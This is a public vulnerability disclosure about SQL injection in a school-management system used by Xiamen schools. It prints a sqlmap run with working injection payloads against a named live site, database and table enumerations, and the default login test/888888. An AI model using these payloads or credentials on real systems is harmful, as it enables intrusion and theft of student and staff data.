Vulnerability summary

Vulnerability details
Disclosure status:
2015-03-31: Details sent to the vendor, awaiting vendor action
2015-04-03: Vendor confirmed; details visible to the vendor only
2015-04-13: Details opened to core white hats and relevant domain experts
2015-04-23: Details opened to regular white hats
2015-05-03: Details opened to intern white hats
2015-05-18: Details made public
Brief description:
Multiple schools and educational institutions in Xiamen run this software, and its login form is SQL-injectable. The report calls it a blind injection; the sqlmap runs below actually identify error-based and UNION-query injection points on the userName parameter, which return data directly rather than one bit per request.
Detailed description:
The vendor's own site runs the same software. I previously submitted a default account and password issue for this company, and it was rejected. On checking, roughly 6 schools had not changed it and the others had (account: test, password: 888888). This time the injection is essentially unfixed everywhere, and the vendor's official site is not fixed either.
Proof of vulnerability:
The following address is SQL-injectable through the userName field of the login form. sqlmap finds an error-based and a UNION-based injection point. The CHAR() chains in its payloads are marker strings (CHAR(113)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113) is 'qqjjq', CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113) is 'qkqkq') that sqlmap wraps around the value it extracts so it can locate that value in the SQL Server error message or in the returned page.
C:\Python27\SqlMap>sqlmap.py -u "http://www.xmxayz.com/Login!showLogin.do" --forms

sqlmap {1.0-dev-nongit-20150313}  http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:11:50

[10:11:50] [INFO] testing connection to the target URL
[10:11:51] [INFO] searching for forms
[#1] form:
POST http://www.xmxayz.com:80/Login!singleSysChkLogin.do
POST data: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D&password=&signup_password=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0&rememberCookie=0&btnSubmit=
do you want to test this form? [Y/n/q]
>
Edit POST data [default: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D&password=&signup_password=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0&rememberCookie=0&btnSubmit=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[10:11:58] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:11:58] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-03292015_1011am.csv' as the CSV results file in multiple targets mode
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D' AND 1185=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1185=1185) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'OavH'='OavH&password=XVvI&signup_password=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0&rememberCookie=0&btnSubmit=InuZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(65)+CHAR(105)+CHAR(73)+CHAR(99)+CHAR(80)+CHAR(100)+CHAR(97)+CHAR(114)+CHAR(107)+CHAR(90)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=XVvI&signup_password=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0&rememberCookie=0&btnSubmit=InuZ
---
do you want to exploit this SQL injection? [Y/n]
[10:12:06] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:12:06] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\Administrator\.sqlmap\output\results-03292015_1011am.csv'

[*] shutting down at 10:12:06
There are too many tables to screenshot, so the output is pasted directly.
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
Database: xayz
[507 tables]
+---------------------------------------------------+
| EX_EXPENSE_AUDIT |
| EX_EXPENSE_AUDIT |
| EX_EXPENSE_ITEM |
| EX_LEAVE_APPLY |
| EX_LEAVE_APPROVE |
| EX_PURCHASE_ITEM |
| EX_PURCHASE_ITEM |
| EX_TRACE_BUG |
| FCS_AREA |
| FCS_BILL |
| FCS_BILLSUB |
| FCS_DATADICT |
| FCS_DEPT |
| FCS_DW |
| FCS_DWTYPE |
| FCS_EMPLOYEE1 |
| FCS_EMPLOYEE1 |
| FCS_EMPLOYEE2 |
| FCS_GROUP |
| FCS_INTBILL |
| FCS_INTBILLSUB |
| FCS_ITEM |
| FCS_MOREPK |
| FC_ATTACH |
| FC_BILLZL |
| FC_DATADICT |
| FC_EBDS |
| FC_ENTITY |
| FC_ENTITYSUB |
| FC_MAXBH |
| FC_QUERY |
| FC_REPORTFILE |
| KJ_CWSH_ITEM |
| KJ_CWSH_ITEM |
| KJ_LEAVE |
| KJ_SYJX_ITEM |
| KJ_SYJX_ITEM |
| MC_OperatorLog |
| Mc_MorningCheck |
| Mc_Symptom |
| Tea_AdminRank |
| Tea_BaseCase |
| Tea_BasedCurriculum |
| Tea_CheckRights |
| Tea_ClassAdviser |
| Tea_ContinuingEdu |
| Tea_DaiJiao |
| Tea_Dictionary |
| Tea_Eduschool |
| Tea_GuideStudent |
| Tea_Honor |
| Tea_InfoAuditNotice |
| Tea_JoBTitleInfo |
| Tea_MajorWorks |
| Tea_OpenClass |
| Tea_ProjectLearning |
| Tea_ProjectLearning |
| Tea_Rights |
| Tea_SkilledLevel |
| Tea_TeachInfo |
| Tea_TeacherSupport |
| Tea_Thesis |
| Tea_TopicSeminar |
| Tea_Train |
| Tea_WorkExperiences |
| Tea_YearExamining |
| Tea_listenClass |
| Tea_visitLesson |
| VIEW_CarApply |
| VIEW_CheckRights |
| VIEW_FileRefer |
| VIEW_Maintain |
| View_CardLog |
| View_DormRoomInfo |
| View_DormRoomInfo |
| View_DutyInfoNew |
| View_DutyType |
| View_EvaluateResult |
| View_HomeWork |
| View_MRepair |
| View_Message |
| View_OnlineCount |
| View_PrintRequest |
| View_PrintTotal |
| View_SchoolSubSystem |
| View_StuScoreEvent |
| View_StudentLeave |
| View_UntreatedNew |
| View_UntreatedNew |
| View_UserRole |
| View_detailgroup |
| WF_COMMON_CHECK |
| WF_CURRENTSTEP_PREV |
| WF_CURRENTSTEP_PREV |
| WF_DEFS_TYPE |
| WF_DSN_CLASS |
| WF_DSN_STATUS |
| WF_DYNAMIC_INSTANCE_PARAM |
| WF_DYNAMIC_INSTANCE_PARAM |
| WF_GROUP_ROLE |
| WF_GROUP_ROLE |
| WF_HISTORYSTEP_PREV |
| WF_HISTORYSTEP_PREV |
| WF_KEY_SEED |
| WF_MY_FLOW |
| WF_PROPERTYENTRY |
| WF_REMINDER_FORM |
| WF_REMINDER_MESSAGE |
| WF_ROLE |
| WF_STEPIDS |
| WF_TASK_COPY_USER |
| WF_TASK_FORM |
| WF_TASK_INFO_USER |
| WF_TASK_INFO_USER |
| WF_TASK_REMINDER |
| WF_TASK_WORKITEM |
| WF_USER_GRANT |
| WF_USER_GRANT |
| WF_USER_GROUP |
| WF_USER_ROLE |
| WF_WFENTRY_PARAM |
| WF_WFENTRY_PARAM |
| WF_WFENTRY_SUB |
| WF_WORKFLOWDEFS |
| ams_article |
| ams_circles |
| ams_class |
| ams_like |
| ams_links |
| ams_review |
| ams_styles |
| ams_users |
| bf_document |
| bm_bmbmc |
| bm_ibm |
| bm_kc |
| bm_kmsz |
| bm_xscj |
| bm_zkz |
| bm_zt |
| category |
| doc_docManage |
| doc_docType |
| doc_docuTemp |
| doc_docuVie |
| doc_docudetailfil |
| doc_docufil |
| doc_document |
| doc_documentType |
| doc_docuno |
| doc_flowInfo |
| doc_prompt |
| dtproperties |
| eva_BasicInfo |
| eva_BasicInfoVoteItem |
| eva_BeEvalTeacher |
| eva_Detail |
| eva_DimUser |
| eva_Dimensional |
| eva_DinfoDetail |
| eva_EvaLimit |
| eva_ItemOptions |
| eva_Question |
| eva_SectionGroup |
| eva_SimpleEvaQuestion |
| eva_SimpleEvaText |
| eva_TeacherDimenTotal |
| eva_TeacherGroupScoreDimen |
| eva_TeacherGroupScoreItem |
| eva_TeacherScoreDimenPerBasicInfo |
| eva_TeacherScoreDimenPerBasicInfo |
| eva_TeacherScoreItem |
| eva_TeacherSingleDimenScore |
| eva_TeacherVoteCount |
| eva_VoteItem |
| exam_bj |
| exam_bjqksbdj |
| exam_fsdmx |
| exam_fsdmx |
| exam_fsdmx |
| exam_fsdzbmx |
| exam_fsdzbmx |
| exam_gradeZfFh |
| exam_ksmc |
| exam_kszbbjmx |
| exam_kszbbjmx |
| exam_kszbbjxk |
| exam_kszbfsdmx |
| exam_kszbfsdmx |
| exam_kszblb |
| exam_kszblrry |
| exam_kszbxkhb |
| exam_kszbxscj |
| exam_pyk |
| exam_xkfsdsz |
| exam_xkpxmx |
| exam_xkpxmx |
| exam_xscj |
| exam_xspy |
| fix_SchoolYearInfo |
| fix_appro |
| fix_asset |
| fix_asstype |
| fix_bill |
| fix_com |
| fix_cred |
| fix_datatree |
| fix_detail |
| fix_durdetail |
| fix_gencred |
| fix_goods |
| fix_iorel |
| fix_midsto |
| fix_place |
| fix_placeUserFlow |
| fix_pope |
| fix_stodetail |
| fix_stodetail |
| fix_sys |
| fix_target |
| fix_type |
| fix_wxlb |
| flc_task |
| flc_userlog |
| js_syjsgl |
| js_sytzdmx |
| js_sytzdmx |
| kj_free_check |
| kj_free_check |
| kj_lxsq |
| kj_pcgl |
| lsb |
| sch_class |
| sch_user_info |
| sch_user_info |
| tbl_Action |
| tbl_AddressBook |
| tbl_AdjustmentLesson |
| tbl_AnswerList |
| tbl_BackUp |
| tbl_BlogConfig |
| tbl_CarApply |
| tbl_CarApply |
| tbl_CardLog |
| tbl_CheckRoll |
| tbl_ClassInfo |
| tbl_Company |
| tbl_Config |
| tbl_ConnUser |
| tbl_ContactGroup |
| tbl_CourseGrade |
| tbl_CourseGrade |
| tbl_CoursePlan |
| tbl_CourseTime |
| tbl_CustomMenu |
| tbl_Department |
| tbl_DoorPriority |
| tbl_DormBuilding |
| tbl_DormCheckMain |
| tbl_DormCheckResult |
| tbl_DormCheckRule |
| tbl_DormNotice |
| tbl_DormRoomInfo |
| tbl_DormRoomInfo |
| tbl_DutyAccessControl |
| tbl_DutyCheckRoll |
| tbl_DutyExp |
| tbl_DutyGroupCheck |
| tbl_DutyGroupCheck |
| tbl_DutyGroupUser |
| tbl_DutyGroupWork |
| tbl_DutyStudent |
| tbl_DutyTeacher |
| tbl_Employee |
| tbl_EvaluateMain |
| tbl_EvaluateResult |
| tbl_EvaluateRule |
| tbl_ExamClassMain |
| tbl_ExamClassRank |
| tbl_ExamClassStat |
| tbl_ExamEntrance |
| tbl_ExamMain |
| tbl_ExamMode |
| tbl_ExamPlace |
| tbl_ExamPlan |
| tbl_ExamPriority |
| tbl_ExamRankBase |
| tbl_ExamRankBase |
| tbl_ExamRankMain |
| tbl_ExamResult |
| tbl_ExamStat |
| tbl_ExamStudentStat |
| tbl_ExamStype |
| tbl_ExamType |
| tbl_ExcelSearch |
| tbl_ExcelSearchType |
| tbl_ExceptionCards |
| tbl_FestivalStyle |
| tbl_FileLaunch |
| tbl_FileRefer |
| tbl_FloatPic |
| tbl_GlyOnlineSignup |
| tbl_GlyZSResume |
| tbl_GradeCode |
| tbl_GradeCode |
| tbl_Group |
| tbl_GroupUser |
| tbl_Holiday |
| tbl_HomeWork |
| tbl_IOSConfig |
| tbl_IOSForm |
| tbl_IOSUser |
| tbl_JobMarketCompany |
| tbl_JobMarketCompany |
| tbl_JobRecruit |
| tbl_JobSeek |
| tbl_JobSeek |
| tbl_LeaveApply |
| tbl_LinkType |
| tbl_Links |
| tbl_ListenerVisitRecord |
| tbl_Log |
| tbl_MRepair |
| tbl_MailBox |
| tbl_Maintain |
| tbl_MaintainUnit |
| tbl_Major |
| tbl_MarkRule |
| tbl_MarkType |
| tbl_Meeting |
| tbl_Mimeograph |
| tbl_Minutes |
| tbl_MsgAttachment |
| tbl_MsgAttachment |
| tbl_MsgBoard |
| tbl_MsgRollNews |
| tbl_MsgSub |
| tbl_MsgType |
| tbl_MultiApply |
| tbl_MultiResource |
| tbl_MyFriend |
| tbl_NewsAttachment |
| tbl_NewsAuditReason |
| tbl_NewsFeedback |
| tbl_NewsInfo |
| tbl_NewsShare |
| tbl_Notice |
| tbl_OnlineAsk |
| tbl_OnlineCount |
| tbl_OnlineForm |
| tbl_OnlineFormResult |
| tbl_OnlinePsy |
| tbl_OnlineQuestion |
| tbl_OnlineSeek |
| tbl_OnlineSignup |
| tbl_OutBookIn |
| tbl_OverTimeApply |
| tbl_PersonalCalendar |
| tbl_Photo |
| tbl_Position |
| tbl_Post |
| tbl_PrintFileType |
| tbl_PrintFileType |
| tbl_PrintRequest |
| tbl_PrintResponse |
| tbl_PrintRoom |
| tbl_PrintType |
| tbl_QuestionInfo |
| tbl_QuickLink |
| tbl_Repair |
| tbl_ResuleQuery |
| tbl_RoleAction |
| tbl_RoleAction |
| tbl_RoleSchoolSubSystem |
| tbl_RoleTypeTree |
| tbl_Rss |
| tbl_SalaryList |
| tbl_SalaryList |
| tbl_SalaryType |
| tbl_SchoolAcadYear |
| tbl_SchoolAcadYear |
| tbl_SchoolCalendar |
| tbl_SchoolConfig |
| tbl_SchoolLevel |
| tbl_SchoolSubSystem |
| tbl_SchoolTemplate |
| tbl_ScoreFile |
| tbl_Section |
| tbl_StuAction |
| tbl_StuScore |
| tbl_StudentBaseScore |
| tbl_StudentBaseScore |
| tbl_StudentClass |
| tbl_StudentEvent |
| tbl_StudentFlow |
| tbl_StudentFlowType |
| tbl_StudentLeave |
| tbl_StudentScoreEvent |
| tbl_StudentScoreEvent |
| tbl_StudentScoreRule |
| tbl_SubSystem |
| tbl_Subject |
| tbl_SubjectRealm |
| tbl_SysCurrentVisit |
| tbl_SysFrameConfig |
| tbl_SysMsgAwoke |
| tbl_SysQuickLink |
| tbl_SysSiteStyle |
| tbl_SysVisitCount |
| tbl_Teacher |
| tbl_Terminal |
| tbl_TypeTreeFlag |
| tbl_TypeTreeFlag |
| tbl_User |
| tbl_UserRole |
| tbl_VisitAim |
| tbl_VisitInfo |
| tbl_WatchList |
| tbl_WatchMain |
| tbl_Watchzb |
| tbl_WeekMemo |
| tbl_WorkTime |
| tbl_WorkType |
| tbl_area |
| tbl_docManage |
| tbl_docuTemp |
| tbl_docuVie |
| tbl_docudetailfil |
| tbl_docufil |
| tbl_document |
| tbl_documentType |
| tbl_docuno |
| tbl_flowInfo |
| tbl_ksmc |
| tbl_logsum |
| tbl_lsb |
| tbl_outbookType |
| tbl_prompt |
| tbl_subStyle |
| tbl_test |
| tbl_webdisk |
| tbl_zxfk |
| test |
| users |
| view_ClassInfo |
| view_CourseGrade |
| view_CourseGrade |
| view_CoursePlan |
| view_DormCheckTotal |
| view_DutyStudent |
| view_DutyTeacher |
| view_ExamClassRank |
| view_ExamClassStat |
| view_ExamMain |
| view_ExamPlan |
| view_ExamResult |
| view_ExamStat |
| view_ExamStudentStat |
| view_FlowDocTypeNew |
| view_FlowDocTypeNew |
| view_Grade |
| view_GroupUser |
| view_IosUser |
| view_MultiApply |
| view_PrintResponse |
| view_StudentEvent |
| view_StudentFlow |
| view_UserSubSystem |
| view_UserTypeTree |
| view_allcred |
| view_bm |
| view_credgroup |
| view_fs |
| view_kszbxscj |
| view_newsInfo |
| view_newsfeedback |
| view_outbookin |
| view_salaryList |
| view_schoolInfo |
| view_studentInfo |
| view_sytzdmx |
| view_teacherInfo |
| view_userAction |
| view_userAction |
| view_xdsStuCards |
| view_xdsStuStarffjl |
| view_xdsStuStars |
| view_xscj |
| xds_apply |
| xds_approve |
| xds_baseConfig |
| xds_cause |
| xds_flowFlagClass |
| xds_honorClass |
| xds_honorType |
| xds_stuCardsNumPerMonth |
| xds_stuHzRecord |
| xds_stuZhangNum |
| xds_surplusCardsNum |
| xds_teacherRemaining |
| yy_jsgl |
| yy_jslx |
| yy_jstp |
| yy_kjsz |
| yy_tzyy |
| yy_yysq |
| yy_yysz |
+---------------------------------------------------+
Database: ywxxDMS
[55 tables]
+---------------------------------------------------+
| VIEW_FileRefer |
| View_FileInfoAll |
| View_FileInfoAll |
| View_FileType |
| View_FileVisitShare |
| View_Message |
| View_MyFriend |
| View_TreeVisitShare |
| dtproperties |
| tbl_Action |
| tbl_Action |
| tbl_BackUp |
| tbl_Config |
| tbl_Department1 |
| tbl_Department1 |
| tbl_FileHistory |
| tbl_FileInfo |
| tbl_FileLaunch |
| tbl_FileRefer |
| tbl_LoginLog |
| tbl_LoginLog |
| tbl_MsgAttachment |
| tbl_MsgAttachment |
| tbl_MsgSub |
| tbl_MyFriend |
| tbl_PersonalCalendar |
| tbl_Position1 |
| tbl_Position1 |
| tbl_RoleAction |
| tbl_RoleAction |
| tbl_RoleTypeTree |
| tbl_TempletTypeTree |
| tbl_Theme |
| tbl_TypeTreeFlag |
| tbl_TypeTreeFlag |
| tbl_TypeTreeRole |
| tbl_User1 |
| tbl_User1 |
| tbl_UserGroup1 |
| tbl_UserGroup1 |
| tbl_UserInfo1 |
| tbl_UserInfo1 |
| tbl_UserProperty |
| tbl_UserRole |
| tbl_companyInfo |
| tbl_cs |
| tbl_templet |
| tbl_userBrowseFile |
| tbl_userFileVisit |
| tbl_userTypeTree |
| view_UserTypeTree |
| view_userAction |
| view_userAction |
| view_userTypeShow |
| xdb_files |
+---------------------------------------------------+
Database: master
[290 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: sjzx
[76 tables]
+---------------------------------------------------+
| T_City |
| T_District |
| T_Province |
| View_ClassInfo |
| View_CourseGrade |
| View_CourseGrade |
| View_CoursePlan |
| View_Grade |
| View_GroupUser |
| View_SchoolInfo |
| View_SchoolSubSystem |
| View_StuParentsInfo |
| View_StudentFlow |
| View_StudentInfo |
| View_Sysuser |
| View_TeacherInfo |
| View_UserAction |
| View_UserAction |
| View_UserRole |
| View_UserSubSystem |
| app_system |
| category |
| dtproperties |
| tbl_Action |
| tbl_BackUp |
| tbl_CardLog |
| tbl_ClassInfo |
| tbl_Config |
| tbl_CourseGrade |
| tbl_CourseGrade |
| tbl_CoursePlan |
| tbl_CourseTime |
| tbl_Department |
| tbl_DutyExp |
| tbl_GradeCode |
| tbl_GradeCode |
| tbl_Group |
| tbl_GroupUser |
| tbl_Log |
| tbl_Logsum |
| tbl_Major |
| tbl_ParentsUsers |
| tbl_Photo |
| tbl_Position |
| tbl_RoleAction |
| tbl_RoleAction |
| tbl_RoleSchoolSubSystem |
| tbl_SchoolAcadYear |
| tbl_SchoolAcadYear |
| tbl_SchoolCalendar |
| tbl_SchoolConfig |
| tbl_SchoolLevel |
| tbl_SchoolSubSystem |
| tbl_SchoolTemplate |
| tbl_Section |
| tbl_StuAction |
| tbl_StudentFamily |
| tbl_StudentFamily |
| tbl_StudentFlow |
| tbl_StudentFlowType |
| tbl_StudentFull |
| tbl_StudentHistory |
| tbl_StudentPrimal |
| tbl_SubSystem |
| tbl_Subject |
| tbl_SubjectRealm |
| tbl_SysUser |
| tbl_Teacher |
| tbl_User |
| tbl_UserRole |
| tbl_WeekMemo |
| tbl_WorkTime |
| tbl_delData |
| tbl_lsb |
| users |
| view_StudentFull |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages90 |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
